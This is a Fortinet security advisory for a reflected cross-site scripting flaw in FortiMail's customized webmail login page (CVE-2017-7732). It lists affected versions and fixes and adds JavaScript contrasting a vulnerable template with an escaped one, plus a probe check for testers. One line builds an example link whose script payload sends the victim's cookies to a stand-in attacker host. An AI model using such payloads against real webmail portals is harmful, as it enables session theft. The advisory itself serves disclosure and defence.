FortiMail reflected XSS vulnerability under customized webmail login page
Fortinet PSIRT Advisories
Fortinet PSIRT Contact: https://fortiguard.fortinet.com/faq/psirt-contact
Advisory ID: FG-IR-17-099
Status: Final
Version: 1 (current version)
Published: 2017-10-13
Updated: 2017-10-13
Summary: A reflected cross-site scripting (XSS) vulnerability exists in the FortiMail customized pre-authentication webmail login page. Because the page is served before authentication, no credentials are needed: an attacker who gets a victim to open a crafted link can execute arbitrary JavaScript in the security context of the victim's browser on the FortiMail webmail origin.
Impact: Cross-site scripting (XSS)
Affected products:
FortiMail 5.2.0 through 5.2.9
FortiMail 5.3.0 through 5.3.9
FortiMail 5.1 and below
Solutions:
FortiMail 5.2 branch: upgrade to 5.2.10 or above.
FortiMail 5.3 branch: upgrade to 5.3.10 or above.
FortiMail 5.4 branch: not impacted.
FortiMail 5.1 and below: use the system default login portal instead of a customized webmail login portal.
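The advisory does not disclose the injection point, so the following is an added illustration rather than FortiMail code: a customized login template that echoes a request parameter verbatim (the vulnerable pattern the summary describes), the same template with output escaping (the pattern a hardened custom portal needs), and the reflection check a tester would run against a pre-authentication page. The `msg` parameter name, the template, and the `webmail.example.test` / `attacker.example` hosts are assumptions for illustration only.

```javascript
// Added illustration, not FortiMail's code. The advisory does not disclose
// the injection point; the "msg" query parameter and this small template are
// assumptions standing in for a customized login page that echoes input.

// Minimal HTML entity escaping for text placed inside an element body or a
// double-quoted attribute.
function htmlEscape(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: a customized template splices a request parameter into
// the page verbatim, so markup carried in the URL is rendered by the
// victim's browser on the webmail origin.
function renderLoginVulnerable(params) {
  const msg = params.get('msg') || '';
  return `<form method="post" action="/login">
  <p class="notice">${msg}</p>
  <input name="user"><input name="pass" type="password">
</form>`;
}

// Hardened pattern: identical template, but every untrusted value is escaped
// before it reaches the markup.
function renderLoginHardened(params) {
  const msg = htmlEscape(params.get('msg') || '');
  return `<form method="post" action="/login">
  <p class="notice">${msg}</p>
  <input name="user"><input name="pass" type="password">
</form>`;
}

// Reflection check a tester would run: does a distinctive probe supplied in
// the parameter come back unescaped in the response body?
function reflectsUnescaped(render, probe) {
  const params = new URLSearchParams({ msg: probe });
  return render(params).includes(probe);
}

// Constructed attacker link (hypothetical hosts) of the kind a victim would
// be lured into opening; the script payload is only rendered by the
// vulnerable template.
const attackerUrl = new URL('https://webmail.example.test/login');
attackerUrl.searchParams.set(
  'msg',
  '<script>location="https://attacker.example/?c="+document.cookie</script>',
);

const probe = '<xss-probe-1234>';
console.log('vulnerable reflects probe:', reflectsUnescaped(renderLoginVulnerable, probe)); // true
console.log('hardened reflects probe:  ', reflectsUnescaped(renderLoginHardened, probe));   // false
```

The probe-based check is the same one to run against any customized FortiMail login page before and after applying the fixed build: if a harmless marker such as `<xss-probe-1234>` comes back byte-for-byte in the page, the portal is reflecting input without encoding.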
Acknowledgement: Fortinet is pleased to thank Silas Aitchison for reporting this vulnerability under responsible disclosure.
Affected versions:
FortiMail 5.3.9
FortiMail 5.3.8
FortiMail 5.3.7
FortiMail 5.3.6
FortiMail 5.3.5
FortiMail 5.3.4
FortiMail 5.3.3
FortiMail 5.3.2
FortiMail 5.3.1
FortiMail 5.3.0
FortiMail 5.2.9
FortiMail 5.2.8
FortiMail 5.2.7
FortiMail 5.2.6
FortiMail 5.2.5
FortiMail 5.2.4
FortiMail 5.2.3
FortiMail 5.2.2
FortiMail 5.2.1
FortiMail 5.2.0
CVE ID: CVE-2017-7732
Reference: https://fortiguard.fortinet.com/psirt/FG-IR-17-099